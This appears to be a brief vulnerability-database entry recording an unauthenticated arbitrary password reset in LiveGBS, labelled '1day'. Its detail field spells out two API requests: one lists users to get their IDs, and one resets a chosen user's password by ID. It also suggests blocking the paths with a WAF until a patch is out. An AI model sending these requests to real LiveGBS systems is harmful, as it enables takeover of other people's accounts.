vendor = "LiveGBS"
name = "LiveGBS任意用户密码重置漏洞"
type = "未授权访问"
version = "未知"
path = "/api/v1/user/list /api/v1/user/resetpassword"
detail = "获取用户id /api/v1/user/list?q=&start=&limit=10&enable=&sort=CreatedAt&order=desc 通过id重置密码 /api/v1/user/resetpassword?id=22&password=123456"
fix = "WAF封禁路路径，等待发布补丁"
date = "0823"
label = "1day"
